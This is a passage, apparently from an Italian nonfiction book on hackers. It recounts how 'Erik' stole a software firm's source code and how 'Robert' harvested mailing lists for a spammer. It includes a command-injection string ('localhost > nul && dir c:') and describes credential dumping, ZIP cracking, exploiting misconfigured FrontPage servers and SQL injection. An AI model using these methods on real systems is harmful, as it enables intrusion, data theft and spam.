del manager, Erik tornò a chiudere il firewall per trasferire dei 
file a un altro sistema dal quale avrebbe poi potuto scaricarli. Du- 
rante l'operazione si rese conto che l'amministratore delegato era 
al computer e aveva notato qualcosa di strano: “Vide che dalla bar- 
ra di sistema mancava l'icona del firewall. Vide che ero connesso”. 
Erik si scollegò immediatamente. Nel giro di un paio di minuti il 
portatile venne riavviato e il firewall era di nuovo attivo. 


Non sapevo se mi stava alle calcagna, così aspettai un paio di setti- 
mane prima di tornare a provarci. Alla fine capii quali erano i suoi 
ritmi di lavoro e quando avrei potuto entrare nel suo sistema. 


Accedere all'applicazione 


Dopo aver mantenuto un profilo basso e aver ripensato la sua 
strategia, Erik ritornò sul portatile del manager e cominciò a esa- 
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minare il sistema più da vicino. Innanzitutto eseguì un’applica- 
zione a linee di comando pubblicamente disponibile, conosciu- 
ta come LsaDump?2, per scaricare le informazioni riservate che 
vengono salvate in una parte specifica del registro chiamata “Se- 
greti dell'autorità di sicurezza locale” (Lsa). I segreti del Lsa con- 
tengono le password in chiaro di vari servizi, la memoria cache 
degli hash delle password degli ultimi dieci utenti, le password 
degli utenti del Ftp e del web e i nomi e le password usate per le 
connessioni in dial-up. 

Con il comando “netstat” vide quali connessioni erano attive 
al momento e quali porte erano predisposte per la connessione. 
Notò che una porta dal numero elevato stava registrando delle 
attività in entrata. Dal server di backup che aveva compromesso 
in precedenza si collegò alla porta aperta e capì che si trattava di 
un web server secondario che veniva usato come una specie di 
interfaccia per la posta. Si rese ben presto conto che poteva ag- 
girare l'interfaccia della posta e piazzare qualsiasi file nella car- 
tella principale del server usato per l'interfaccia della posta. Ades- 
so era in grado di scaricare facilmente dei file dal portatile del- 
l'amministratore delegato al server di backup. 

Nonostante i piccoli progressi compiuti nel corso dell’anno, 
Erik non aveva ancora messo le mani sul codice sorgente del pro- 
dotto, né sul generatore dei codici della licenza. Tuttavia, l'idea 
di lasciar perdere non lo sfiorava nemmeno. Anzi, era ora che le 
cose si stavano facendo interessanti. “Trovai una copia della car- 
tella ‘strumenti’ sul portatile dell’amministratore. Lì scovai umin- 
terfaccia per un generatore di codici di licenza, ma senza acces- 
so al database reale.” 

Non aveva trovato il server delle licenze su cui girava il data- 
base aggiornato in tempo reale con tutti i codici dei clienti, ma so- 
lamente qualcosa che puntava verso di esso: “Non sapevo dove si 
trovavano i veri strumenti di gestione delle licenze usati dagli im- 
piegati della ditta. Avevo bisogno di trovare questo server”. Ebbe il 
presentimento che potesse essere sullo stesso server su cui c'era la 
posta, dato che l'impresa gestiva un sito che permetteva ai clienti 
di acquistare direttamente il software. Una volta che la transazio- 
ne con la carta di credito veniva approvata, il cliente riceveva un’e- 
mail con il codice della licenza. A Erik rimaneva solo un server da 
localizzare e in cui penetrare: doveva essere lo stesso server che 
conteneva l'applicazione per generare i codici delle licenze d'uso. 

Erik aveva ormai trascorso mesi nella rete interna, ma non 
aveva ancora ottenuto ciò che stava cercando. Decise di curiosa- 
re nel server di backup già compromesso e cominciò a scansio- 
nare le porte del server di posta degli altri server di cui si era già 
“impadronito”, utilizzando uno spettro più ampio di porte nella 
speranza di scoprire servizi che girassero su porte non standard. 
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Pensò anche che sarebbe stato meglio eseguire la scansione da 
un server fidato nell'eventualità che il firewall accettasse solo de- 
terminati indirizzi Ip. 

Per le due settimane successive scansionò la rete nel modo 
più silenzioso possibile per identificare dei server su cui girasse- 
ro servizi insoliti o che potevano attivare servizi noti su porte non 
standard. 

Mentre proseguiva la sua attività di controllo delle porte, Erik 
iniziò a esaminare la cronologia di Internet Explorer, dell'’ammi- 
nistratore di sistema e di vari utenti. Fece così una nuova sco- 
perta: gli utenti si collegavano dal server di backup al server di 
posta principale con Internet Explorer, tramite una porta con un 
numero molto alto. Si rese conto che il server bloccava gli accessi 
a questa porta alta a meno che la connessione non provenisse da 
un indirizzo Ip “autorizzato”. 

Alla fine trovò un server web su una porta alta (“1800 o qual- 
cosa del genere”, ricorda Erik) e riuscì a indovinare la combina- 
zione di nome utente e password che gli aprì un menu. Una delle 
opzioni consentiva di visualizzare delle informazioni sui clienti. 
Un'altra serviva a generare codici di licenza per i loro prodotti. 

Tombola! 

Era il server con il database aggiornato in tempo reale. Erik 
sentiva l'adrenalina che pompava mentre si avvicinava al suo 
obiettivo. Ma “l’accesso a questo server era davvero stretto, in- 
credibilmente stretto”. Ancora una volta aveva imboccato una 
strada senza uscita. Ritornò allora sui suoi passi, fece mente lo- 
cale e gli venne un'altra idea: 


Avevo il codice sorgente di queste pagine web grazie alla copia di ri- 
serva del sito che avevo trovato sul portatile del manager. Su una pa- 
gina trovai un link ad alcuni strumenti di diagnostica di rete, come 
netstat, traceroute e ping. Potevi inserire un indirizzo Ip nel mo- 
dulo online, cliccare “ok” e il sistema avrebbe eseguito il comando 
e mostrato i risultati sullo schermo. 


Aveva notato un baco in un programma che poteva eseguire 
una volta autenticato sulla pagina web. Scegliendo lopzione per 
eseguire il comando “tracert”, il programma gli permetteva di fa- 
re un “traceroute”, seguendo il percorso intrapreso dai pacchet- 
ti per arrivare all'indirizzo Ip di destinazione. Erik si accorse che 
poteva ingannare il programma e fargli eseguire un comando del- 


4 Rispettivamente uno strumento di statistica degli accessi a un sito, uno 
strumento per ricostruire il percorso dei pacchetti inviati a un certo indirizzo Ip 
e uno strumento per verificare lo stato e i tempi di risposta di un certo indirizzo 
Ip.INd.T.} 
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la shell semplicemente inserendo un indirizzo Ip, seguito dal sim- 
bolo “&” e poi il comando della shell. Avrebbe quindi inserito 
qualcosa formulato nel modo seguente: 


localhost > nul && dir cà 


In questo esempio, l'informazione inserita nel form viene ag- 
giunta dallo script Cgi dopo il comando di traceroute. La prima 
parte (fino al simbolo “&”) dice al programma di eseguire un trac- 
ciamento del percorso fino a se stesso (il che è inutile) e di rein- 
dirizzare il risultato del comando a nul, che fa sì che il risultato 
venga “gettato nel cestino dei bit” (cioè che non vada da nessuna 
parte). Una volta che il programma ha eseguito la prima parte, i 
simboli “&&” indicano che c'è un altro comando shell da ese- 
guire. In questo caso si tratta di un comando che mostra il con- 
tenuto della cartella principale del disco C. Una cosa estrema- 
mente utile all'autore di un attacco perché gli consente di ese- 
guire qualunque comando della shell a suo piacimento con i pri- 
vilegi dell'account sotto cui sta girando l’intero server. 

“Mi diede tutti i diritti di accesso di cui avevo bisogno,” di- 
ce Erik. “Avevo accesso praticamente a tutto quello che c’era sul 
server.” 

La faccenda cominciava a farsi impegnativa. Erik notò ben 
presto che gli sviluppatori della compagnia salvavano ogni notte 
sul server una copia di tutto il codice sorgente. “Era una monta- 
gna di codice: l’intero backup erano circa 50 Mb.” Riuscì a ese- 
guire una serie di comandi per spostare tutti i file che voleva nel- 
la cartella principale del server per poi semplicemente scaricar- 
li sulla prima macchina in cui era entrato, il web server di backup. 


Beccato! 


Nell'episodio dell’amministratore delegato si era salvato per 
un pelo. Apparentemente il dirigente si era insospettito, ma gra- 
zie alla sua fitta agenda e alla discrezione da parte di Erik, non 
c'erano stati altri motivi d'allarme. Tuttavia, rovistando sempre 
più in profondità nel cuore del sistema informatico dell'azienda, 
divenne via via più difficile per Erik mantenere un profilo basso. 
Quello che accadde in seguito è spesso il prezzo che si paga quan- 
do si spinge un hack all’estremo e si rimane a lungo su un siste- 
ma altrui. Erik stava cominciando a scaricare il codice sorgente 
del programma cercato così a lungo, quando... 


Circa a metà del download notai che si era bloccato. Guardai nella 
cartella e il file non c'era più. Mi misi a guardare alcuni dei file di 
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log e ai cambi di date e mi resi conto che in quello stesso istante c'e- 
ra qualcuno sul server che stava guardando gli stessi file. Sapeva che 
stavo facendo qualcosa: in pratica mi aveva beccato. 


Chiunque fosse la persona che aveva rilevato la presenza di 
Erik, non perse tempo a cancellare rapidamente i file più im- 
portanti. Il gioco era finito. Ma era finito davvero? 

Erik si scollegò e non ritornò per un mese. A quel punto era- 
no ormai molti mesi che aveva cercato di mettere le mani su quel 
software e si potrebbe pensare che avesse perso ogni speranza. 
Non era così, come lui stesso racconta: 


Non mi sentii mai frustrato perché è qualcosa di più di una sfida. 

Se non riesco a entrare al primo tentativo, vuol dire solo che c'è un 

nuovo elemento che si aggiunge al rompicapo. Non è certamente 

una frustrazione. Assomiglia parecchio a un videogioco, nel modo 

in cui si passa da un livello all’altro e di sfida in sfida. Fa semplice- 
` mente parte del gioco. 


Erik è un seguace di un credo particolare, secondo cui esse- 
re perseveranti a sufficienza paga sempre: 


Se una cosa non funzionava, io semplicemente provavo con qual- 
cos'altro perché sapevo che alla fine avrei trovato qualcosa. Si tro- 
va sempre. Bisogna solo scoprire cos'è. 


Di nuovo in territorio nemico 


Nonostante l'improvvisa ritirata, un mese dopo era di nuovo 
lì, collegato al computer dell'’amministratore delegato per dare 
un'occhiata ai file di registro della chat (l'amministratore salva- 
va i log della chat) e vedere se ci fossero degli appunti su qual- 
cuno che aveva notato i tentativi di hackeraggio. Ricordando il 
giorno e l’ora esatta in cui era stato individuato, passò in rasse- 
gna il file dei log. Non c'erano riferimenti a hacker o a tentativi 
non autorizzati di download. Fece un sospiro di sollievo. 

Scoprì invece di essere stato molto fortunato. Praticamente al- 
la stessa ora c’era stata un'emergenza con uno dei clienti della so- 
cietà. Il responsabile del sistema informatico aveva abbandonato 
quello che stava facendo per gestire la situazione. Nel log della chat 
Erik trovò un intervento successivo in cui si diceva che il respon- 
sabile aveva controllato il registro del accesso ed eseguito una scan- 
sione con l'antivirus, ma niente di più. “Sembrava che il tizio aves- 
se pensato a qualcosa di sospetto, che avesse guardato con un po’ 
più di attenzione, ma che non fosse riuscito a spiegarsi l’accadu- 
to,” e che quindi avesse semplicemente lasciato perdere. 
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Erik si ritirò e aspettò che passasse un po’ di tempo, poi rien- 
trò, ma con maggiori cautele e solo durante l'orario di chiusura, 
quando poteva essere abbastanza sicuro che non ci fosse nessu- 
no in giro. 

Pezzo dopo pezzo scaricò l’intero file del codice sorgente, fa- 
cendo rimbalzare la trasmissione del file su un server interme- 
dio situato in un paese straniero, e per una buona ragione, visto 
che stava facendo tutto da casa sua. 

Erik descrisse la sua familiarità con la rete di quell’impresa 
in termini che all'apparenza potrebbero sembrare fin troppo al- 
tisonanti. Ma se si considera il tempo che impiegò a rovistare tra 
le innumerevoli pieghe del sistema informatico della ditta, rico- 
struendolo passo dopo passo fino a conoscerne le peculiarità più 
recondite e intime, queste affermazioni di Erik rientrano effetti- 
vamente nei limiti della credibilità: 


Conoscevo la loro rete meglio di un qualsiasi loro dipendente. Se 
avessero avuto dei problemi, li avrei potuti risolvere meglio di quan- 
to avrebbero potuto fare loro. Voglio dire, conosco ogni parte della 
loro rete come le mie tasche. 


Non ancora 


Erik aveva scaricato sul suo computer —- finalmente in modo 
sicuro - il codice sorgente del software installato sul server, ma 
non ancora in una forma tale da poter essere aperto e studiato. 
Visto che il software era così pesante, lo sviluppatore che lo sal- 
vava sul server di backup l'aveva compresso nella forma di un fi- 
le Zip crittato. Prima provò con un semplice programma di crac- 
caggio delle password dei file Zip, ma senza risultati. Ci voleva 
un piano B. 

Erik passò a un nuovo e migliore software di decifrazione 
chiamato PkCrack, che usa una tecnica chiamata “attacco cono- 
sciuto di solo testo”. Conoscendo una certa quantità di dati in 
formato solo testo appartenenti al file crittato si riescono a de- 
crittare tutti gli altri file compressi nel file zippato: 


Aprii il file zippato e trovai un file “logo.tif’, così andai sul loro sito 
principale e cercai tutti i file chiamati “logo.tif”. Li scaricai, li com- 
pressi tutti e ne trovai uno la cui dimensione corrispondeva a quel- 
la di uno dei file nel file zippato protetto. 


A quel punto Erik aveva il file Zip protetto e una versione non 
protetta del file “logo.tif’. A PkCrack ci vollero solo cinque minuti 
per comparare le due versioni dello stesso file e recuperare la pass- 
word. Con la password decompresse velocemente tutti gli altri file. 
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Dopo centinaia di lunghe notti, Erik aveva finalmente in ma- 
no il codice sorgente completo che aveva tanto desiderato. 

Quanto all’aver dedicato così tanto tempo a questo obiettivo, 
Erik lo spiega così: 


Ah, è semplice, è tutta una questione di fascino. Mi piacciono le sfi- 
de e non mi piace essere scoperto. Mi piace fare le cose in modo di- 
verso e senza fare rumore. Mi piace trovare la via più fantasiosa. 
Chiaro, uploadare uno script è più facile, ma il mio metodo era mol- 
to ma molto più divertente. Chi se ne frega di essere uno script kid- 
die, quando puoi essere un hacker. 


Cosa ne fece poi del software e del suo generatore di codici 
di licenze? La risposta è che sia lui sia Robert, il protagonista del- 
la prossima storia, seguono più o meno lo stesso percorso, un 
percorso comune alla maggior parte dei cracker in tutto il mon- 
do. Troverete il seguito della storia nella sezione intitolata “Con- 
divisione” verso la fine del capitolo. 


Robert, l’amico dello spammer 


Nella lontana Australia vive un altro di quei rispettati genti- 
luomini che di giorno sono stimati professionisti della sicurezza 
e di notte si trasformano in blackhat hacker, perfezionando quel- 
le capacità che consentono loro di pagarsi il mutuo hackerando 
i produttori di software più resistenti al mondo. 

Mala persona in questione, Robert, non può essere facilmente 
incasellata in una categoria. Il suo profilo sembra più comples- 
so: un mese hackera alla ricerca di software spinto solo dalla vo- 
glia di divertirsi e dal gusto della sfida, e quello successivo ac- 
cetta di partecipare a un progetto a pagamento che lo renderà 
per alcuni “uno spammer spudorato”, secondo la sua stessa de- 
finizione. Come vedrete, spudorato non si riferisce al fatto che 
abbia lavorato occasionalmente come spammer, ma al tipo di 
spamming prodotto. 

“Fare soldi con l’hacking,” confessa, “è un lavoro concettua- 
le.” Potrebbe sembrare un’autogiustificazione, ma c'è da dire che 
non ha avuto remore a condividere con noi questa storia. Anzi, 
cominciò lui stesso a raccontarla senza che gli venisse richiesto, 
chiarendo il concetto attraverso un termine di suo conio: “Direi 
che mi potreste chiamare uno ‘spacker’: un hacker che lavora per 
conto degli spammer”. 


Fui contattato da un amico che mi disse: “Voglio vendere del porno 
bondage hardcore a migliaia di persone. Ho bisogno di milioni su 
milioni di indirizzi e-mail di persone che sono interessate al porno 
bondage hardcore”. 
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Chiunque di noi sarebbe stato alla larga da una proposta si- 
mile. Robert “ci pensò un po’ su” e poi decise di dare un’occhia- 
ta a ciò che poteva comportare. “Feci una ricerca di tutti questi 
siti di bondage hardcore”, ammettendo che lo fece nonostante “il 
disgusto della mia fidanzata”. Condusse la ricerca nel modo più 
ovvio e diretto: con Google e con un altro motore di ricerca 
(http://\www.copernic.com) che usa diversi motori di ricerca. 

Il risultato fu una prima lista di lavoro. “L'unica cosa che vo- 
levo da questi siti era sapere a chi piace il loro porno bondage, 
chi vuole ricevere aggiornamenti, a chi interessa questa roba.” Se 
Robert doveva contribuire a fare spam, non aveva intenzione di 
farlo “come il solito branco di idioti”, mandando centinaia di e- 
mail a chicchessia, che avessero mostrato o meno un qualche in- 
teresse per l'argomento. 


Mettere le mani sulle mailing list 


Robert scoprì che molti siti di bondage usavano una nota ap- 
plicazione per gestire l'iscrizione alle mailing list, che chiamerò 
“SubscribeList”. 


Usando solo Google trovai qualcuno che aveva ordinato una copia 
di [SubscribeList] e ce l'aveva sul web server. Penso fosse un sito di 
Taiwan o della Cina. 


Il passo successivo fu anche più facile del previsto: 


Il loro server era configurato male. Un utente qualunque poteva ve- 
dere il {codice] sorgente del software. Non era l'ultima versione, ma 
era comunque una versione ragionevolmente recente. 


L'errore era che qualcuno per sbaglio o per poca attenzione 
aveva lasciato un file compresso del codice sorgente nella cartel- 
la principale del server. Robert lo scaricò. 

Con questo programma e dei nomi che avrebbe catturato da 
siti esistenti, immaginava Robert: 


Avrei potuto spedire delle e-mail che dicessero: “Ritorna sul mio si- 
to, abbiamo uno speciale sulle fruste ed è tutto a metà prezzo”. 
C'è un sacco di gente che si iscrive a cose del genere. 


Comunque fino a quel momento aveva il software, ma non le 
mailing list.” 

Si mise a studiare il codice sorgente di SubscribeList e alla 
fine scoprì una possibilità. La spiegazione tecnica è complicata 
e rimandiamo al paragrafo delle considerazioni alla fine del ca- 
pitolo. 
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In modo simile a come il cracker della storia precedente ave- 
va usato il simbolo “&” per indurre un programma a eseguire i 
suoi comandi, Robert utilizzò un punto debole di “setup.pl”. 
Questo difetto, chiamato “backticked variable injection flaw”,5 
è basato su un programmino di installazione, lo script setup.pl, 
che non verifica correttamente i dati che gli vengono passati. 
(La differenza fra i due casi riportati è nel sistema operativo: il 
metodo di Erik funziona con Windows, quello di Robert con Li- 
‘nux.) L'autore di un attacco doloso può inviare una stringa di 
dati che altererebbero un valore archiviato in una variabile in 
modo tale che lo script sia indotto a creare un altro script Perl 
per eseguire dei comandi arbitrari. Grazie alla svista di questo 
programmatore, chi attacca può immettere dei comandi dalla 
shell. 

Con questo metodo si raggira setup.pl in modo che pensi che 
l'attaccante ha appena installato SubscribeList e vuole fare la pri- 
ma configurazione. Robert avrebbe realizzato questo trucco con 
tutte le imprese che usavano la versione vulnerabile del soft- 
ware. Come trovò una società di porno bondage che rispondes- 
se a questa descrizione? 

Il suo codice, sostiene Robert, “è un rompicapo da scrivere, 
veramente maledetto”. Quando il suo script finiva il lavoro, ri- 
puliva da solo le tracce e poi riconfigurava tutte le variabili così 
come le aveva trovate in modo che nessuno si accorgesse di nul- 
la. “Per quel che ho potuto vedere, non se ne è accorto nessuno.” 

Nessun hacker intelligente farebbe mandare questi file diret- 
tamente a un proprio indirizzo in un modo che possa essere rin- 
tracciato: 


Sono proprio un grande fan del web, lo adoro. Il web è anonimo. 
Puoi entrarci da un Internet caffè e nessuno può sapere chi cazzo 
sei. I miei file hanno rimbalzato da una parte all'altra del pianeta un 
po' di volte e non c'è nessun collegamento diretto. Così è più diffi- 
cile da tracciare e resteranno forse solo una o due righe nei log [del- 
la compagnia]. 


Il porno paga 


Robert aveva scoperto che molti siti di bondage usano lo stes- 
so software per le mailing list. Con il suo programma modifica- 
to, li prese di mira e mise le mani sulle loro liste di indirizzi, che 
poi rigirò al suo amico, lo spammer. Robert vuole che sia chiaro 
che “non spammavo le persone direttamente”. 


5 Letteralmente “errore di inserimento variabile con apici inversi”. [N.d.7.] 
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La campagna fu incredibilmente efficace. Quando spammi 
direttamente persone cui sai già che “piacerà un sacco questa ro- 
ba” (per usare la colorita espressione di Robert), il tasso di ri- 
sposta batterà ogni record: 


Di solito ti ritrovi [un tasso di risposta dello] 0,1-0,2 percento. [Noi 
stavamo] avendo almeno il 30 percento grazie all'uso di bersagli mi- 
rati. Tra il 30 e il 40 percento delle persone compravano. Come tas- 
so di spamming è assolutamente fenomenale. 

Tenuto conto di tutto, devo aver portato in cassa qualcosa come qua- 
rantacinque-cinquantamila dollari. A me ne diedero un terzo. 
Dietro al successo di questa sordida storia c'è la capacità di Robert 
di raccogliere liste di indirizzi di persone disponibili a sborsare del 
denaro per questo tipo di prodotti. Se le cifre che ci ha riferito cor- 
rispondono a verità, è un triste ritratto del mondo in cui viviamo. 
“Recuperai,” ammette, “fra i dieci e i quindici milioni di nomi.” 


Robert l'uomo 


Robert insiste che, nonostante questo episodio, “non sono un 
terribile spammer immorale, sono una persona onesta”. Il resto 
della sua storia corrobora questa affermazione. Lavora nella si- 
curezza di “un'impresa molto religiosa e rispettabile”, e come con- 
sulente autonomo su progetti esterni. Ha anche pubblicato su ar- 
gomenti concernenti la sicurezza. 

Lo trovo particolarmente eloquente a proposito del suo at- 
teggiamento nei riguardi dell’hacking. 


Mi piace molto sentirmi sfidato da un sistema e mi piace affrontar- 
lo sul piano della configurazione e su quello sociale, piuttosto che 
strettamente tecnico. Con piano sociale voglio dire che mi piace en- 
trare nella [testa della] persona seduta al computer. 


Robert ha alle spalle una lunga storia di hacking. Ci parla di 
un amico, un hacker americano il cui nome non vuole sia rivela- 
to, con cui faceva spesso un gioco: 


Entrambi entravamo nei server di un sacco di società di sviluppo 
software, gente che produceva i controlli per Active X e Delphi, e al- 
tri piccoli strumenti molto carini per programmare. Poi prendeva- 
mo una rivista di settore; su ogni pagina c'era una pubblicità di que- 
sti prodotti, e vedevamo chi riusciva a trovarne uno che non aveva- 
mo ancora hackerato. Soprattutto i videogiochi. 


Robert “gironzolava” per le reti interne delle più grandi soft- 


ware house di videogiochi e prendeva il codice sorgente di alcu- 
ni dei loro prodotti. 
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Alla fine lui e il suo amichetto hacker si resero conto che “pra- 
ticamente eravamo entrati nei server di tutti quelli che pubbli- 
cizzavano nuovi prodotti: ‘Questo ce l'abbiamo, questo anche e 
anche questo... Dobbiamo ancora entrare qui, ma abbiamo que- 
st'altro’.” 

In ogni caso Robert nutriva un interesse particolare per un’a- 
rea specifica: quella dei software per la cosiddetta “postprodu- 
zione video”, e in particolare per i prodotti usati per creare le ani- 


mazioni dei film. 


Adoro il casino che c'è nelle cose che fa questa gente. Quelli che le 
programmano sono dei geni. Mi piace aprire il codice e capire co- 
me funziona, perché quando vedi queste animazioni hanno un aspet- 

. to davvero alieno. Voglio dire, quando vedi [i film d’animazione] al- 
la tv è facile pensare: “Santa merda, è davvero fantastico”. 


Robert trova particolarmente affascinante guardare il codice 
da un punto di vista puramente matematico: “Le equazioni e le 
funzioni, l'atteggiamento mentale delle persone che creano que- 
ste cose. È fenomenale”. 

L'insieme di tutte queste cose lo spinse verso quello che con- 
sidera il suo hack più memorabile. 


Un software tentatore 


Nel 2003 Robert stava leggendo come al solito le pubblicità 
dei prodotti su una rivista di software quando si imbatté in un 
nuovo software per produrre “effetti per il video digitale, con co- 
se molto belle per gli effetti luce, che li rendevano realistici, gra- 
zie a delle sfumature incredibilmente morbide”. 

L'intera campagna pubblicitaria era impostata sul fatto che 
il prodotto era uno degli strumenti per il disegno, la modellazio- 
ne e il rendering che erano stati usati in un recente e popolare 
film d'animazione: 


Quando ne sentii parlare per la prima volta, subito mi sembrò 
troppo interessante. E alcune persone che frequentano i miei stes- 
si giri, cioè in rete, avevano dimostrato grande interesse per que- 
sto software. Un bel po’ di gente voleva metterci le mani sopra. 
Tutti volevano questa applicazione perché è difficile da ottenere, è dav- 
vero costosa, nell’ordine dei due-trecentomila dollari. Viene usata da 
imprese come Industrial Light and Magic ed è probabile che l'abbia- 
no comprato non più di quattro o cinque società in tutto il mondo. 
Insomma, avevo davvero una gran voglia di avere questo software e 
mi proposi di fare un po’ di ricerche su questa società. La chiamerò 
semplicemente società X, va bene? La società X si trovava intera- 
mente negli Stati Uniti e tutta la loro rete era centralizzata. 
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Il suo scopo non era solo di prendere il software per sé, ma 
di condividerlo e renderlo disponibile a milioni di utenti in tutto 
il mondo. 

Scoprì che l'impresa aveva “un firewall proprio all’entrata e 
una piccola e ristretta rete interna. Avevano un bel po’ di server 
e diversi web server. Da questo particolare dedussi che dovevano 
avere probabilmente sui cento, centocinquanta dipendenti”. 


Alla scoperta dei nomi dei server 


Robert utilizza una strategia standard quando cerca di pene- 
trare in una rete aziendale di dimensioni significative. “Cerco di 
capire come affrontano la necessità per il personale di accedere 
alla rete interna. Per una grande impresa questo problema è mol- 
to più rilevante che per una piccola. Se hai cinque dipendenti, 
puoi mandare loro un'e-mail, giusto? O li puoi incontrare tutti e 
dirgli: ‘Questo è il modo per connettervi al vostro server da casa 
e questo è il modo per scaricare la posta’.” 

Ma una società di grandi dimensioni avrà normalmente un 
servizio di assistenza tecnica (help desk) o qualche risorsa ester- 
na cui il personale può rivolgersi quando ha qualche problema 
informatico. Robert immaginava che un'impresa con un nume- 
ro significativo di dipendenti dovesse avere da qualche parte — 
molto probabilmente proprio all’help desk — una serie di istru- 
zioni che spiegano come accedere ai file e alla posta elettronica 
da un computer remoto. Se avesse trovato queste istruzioni, pro- 
babilmente avrebbe potuto comprendere i passi necessari per en- 
trare nella rete da utente esterno: per esempio sapere qual era il 
software richiesto per connettersi alla rete interna attraverso la 
Virtual Private Network (Vpn) aziendale. Nello specifico, Robert 
sperava di scoprire quali punti di accesso venissero usati dagli 
sviluppatori per entrare dall’esterno nel sistema di sviluppo del 
software, perché da lì sarebbe stato possibile accedere al tanto 
ambito codice sorgente. 

Quindi in questa fase la sfida era trovare il modo di arrivare 
al servizio di assistenza tecnica: 


Cominciai usando una piccola applicazione chiamata Network Map- 
per, una cosa che ho scritto io. Sostanzialmente passa in rassegna 
una lista di nomi tipici degli host. La uso come strumento sequen- 
ziale per risolvere il Dns. 


Network Mapper identifica gli host e ricava l'indirizzo Ip di 


ognuno di loro. Questo programmino scritto da Robert in Perl 
scorre semplicemente un elenco di nomi di host usati di fre- 
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quente e controlla se esistono nel dominio dell'impresa pre- 
scelta. Così, per esempio, in un attacco a un'azienda chiamata 
Digitaltoes, lo script cercherebbe web.digitaltoes.com, mail.di- 
gitaltoes.com e così via. Questo esercizio può scoprire gli indi- 
rizzi Ip nascosti o blocchi di indirizzi che non sono facili da 
identificare. Eseguendo lo script, Robert potrebbe ottenere dei 
risultati come questi: 


beta.digitaltoes.com 

Ip Address #1:63.149.163.41... 
ftp.digitaltoes.com 

Ip Address #1:63.149.163.36... 
intranet.digitaltoes.com 

Ip Address #1:65.115.201.138... 
mail.digitaltoes.com 

Ip Address #1:63.149.163.42... 
www.digitaltoes.com 

Ip Address #1:63.149.163.36... 


Questa analisi rivelerebbe perciò che la nostra azienda Digi- 
taltoes ha alcuni server all’interno del blocco di indirizzi 63.149, 
ma scommetterei sul fatto che il server nel blocco 65.115 con il 
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nome “intranet” è la loro rete interna. 


Un piccolo aiuto da helpdesk.exe 


Fra i server scoperti da Robert con il suo Network Mapper 
c'era quello sperato: helpdesk.societaX.com. Tuttavia, quando 
cercò di visitarne il sito, apparve una finestra di dialogo per il log- 
in che gli richiedeva un nome utente e una password e restrin- 
geva l’accesso ai soli utenti autorizzati. 

L'applicazione dell’help desk era su un server su cui girava 
IIS4, una vecchia versione del software Internet Information Ser- 
ver (IIS) della Microsoft, che Robert sapeva avere un certo nu- 
mero di punti vulnerabili. Con un po’ di fortuna avrebbe potuto 
trovarne uno utile che non era ancora stato riparato. 

Nel frattempo scoprì anche una vera e propria voragine. Un 
amministratore dell'azienda aveva abilitato Microsoft Front 
Page (un'applicazione usata per creare e modificare facilmente 
documenti html) in modo che chiunque potesse caricare o sca- 
ricare file nella e dalla cartella principale in cui erano archiviati 
i file del web server. 

(Conosco il problema. Uno dei web server della mia neonata 
impresa di sicurezza fu hackerato usando un punto debole simi- 
le, in quanto l'amministratore di sistema che mi stava dando una 
mano su base volontaria non aveva configurato correttamente il 
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sistema. Fortunatamente il server era una macchina isolata che 
risiedeva su un segmento di rete separato.) 

Rendendosi conto che questo errore gli dava la possibilità di 
scaricare e caricare file sul server, cominciò a osservare come era 
stato configurato il server: 


L'errore più comune con alcuni stupidi server Iis si verifica se {chi 
li ha installati] ha abilitato le funzioni di FrontPage. 


E in effetti questo sito aveva un punto debole. Impiegare Mi- 
crosoft FrontPage senza assegnare i giusti permessi a volte è una 
svista dell’amministratore di sistema; altre volte invece viene con- 
figurato così intenzionalmente per comodità. In questo caso non 
soltanto chiunque poteva leggere i file, ma poteva anche caricarli 
in qualunque cartella priva di protezione. Robert era al settimo 
cielo: 


Guardavo e mi dicevo: “Santa merda, posso aprire e modificare tut- 
te le pagine del server senza bisogno di un nome utente o di una 
password”. 
Così sono riuscito a entrare e visualizzare la cartella principale del 
web server. 


Robert è dell'opinione che in casi come questi gli hacker per- 
dano una grossa opportunità: 


Il fatto è che quando le persone eseguono una scansione di rete su 
un server, spesso non considerano gli errori comuni di configura- 
zione con le estensioni dei server come FrontPage. Guardano [che 
tipo di server è] e concludono: “Beh, è un Apache” o “E un Iis”. E 
non si accorgono che possono rendere il proprio lavoro molto più 
facile se FrontPage è stato configurato male. 


Tuttavia non fu la manna che si era aspettato perché “su quel 
server non c'era poi granché”. Comunque notò che quando si col- 
legava al sito con il browser si attivava un’applicazione chiama- 
ta “helpdesk.exe”. Il che gli sarebbe potuto tornare di grande aiu- 


to, ma richiedeva un log-in con una password: 


Allora, sono lì che guardo e mi chiedo come cazzo posso attaccar- 
lo. Una cosa che proprio non mi piace è uploadare dei file su un web 
server; perché se un amministratore guarda i log e vede un migliaio 
di persone che entrano in helpdesk.exe e tutt’a un tratto un tizio dal 
Sud del Pacifico che entra in two.exe o cose del genere, insomma si 
insospettirebbe, giusto? Quindi preferisco rimanere fuori dai log. 


L'applicazione helpdesk consisteva in un singolo file esegui- 
bile e in un file di una dynamic-link library (dll). I file con esten- 
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sione .dll contengono una raccolta di funzioni di Windows che 
l'applicazione può richiamare. 

Avendo la possibilità di caricare dei file nella cartella princi- 
pale del web server, chi attacca potrebbe tranquillamente uploa- 
dare un semplice script che gli consenta di eseguire dei coman- 
di dal suo browser. Ma Robert non è un hacker qualsiasi. Si van- 
ta di essere agile e leggero, e di lasciare nei log del web server po- 
che o nessuna traccia del suo passaggio. Invece di caricare sem- 
plicemente uno script opportunamente modificato, si basò su sue 
esperienze precedenti e scaricò sul suo computer i file help- 
desk.exe ed helpdesk.dll per analizzare il funzionamento dell’ap- 
plicazione. “Ho creato diverse applicazioni con il reverse engi- 
neering e guardando le cose scritte in Assembler”, e quindi sa-- 
peva come comportarsi con il codice C7 compilato per poi ritra- 
durne una buona parte in Assembler. 

Il programma di cui si servì si chiama Ida Pro, o Interactive 
Disassembler (venduto da http://www.ccso.com) e viene usato, se- 
condo le sue stesse parole, “da molte società di antivirus e caccia- 
tori di worm, che cercano di decompilare qualcosa a livello del- 
l’Assembler, per poi aprirlo e capire cosa sta facendo”. Decompilò 
helpdesk.exe e, approvando il lavoro effettuato da programmato- 
ri professionali, decise che era stato “scritto piuttosto bene”. 


Dalla scatola dei trucchi dell'hacker: l'attacco a Sql Injection 


Una volta decompilato il programma, Robert analizzò il co- 
dice per vedere se l'applicazione dell’helpdesk poteva essere sog- 
getta a un “Sql Injection”, un metodo di attacco che sfrutta una 
comune svista nella programmazione. Un programmatore attento 
metterà al sicuro tutte le richieste dell'utente includendo un co- 
dice che, fra le altre cose, filtri alcuni caratteri speciali come Fa- 
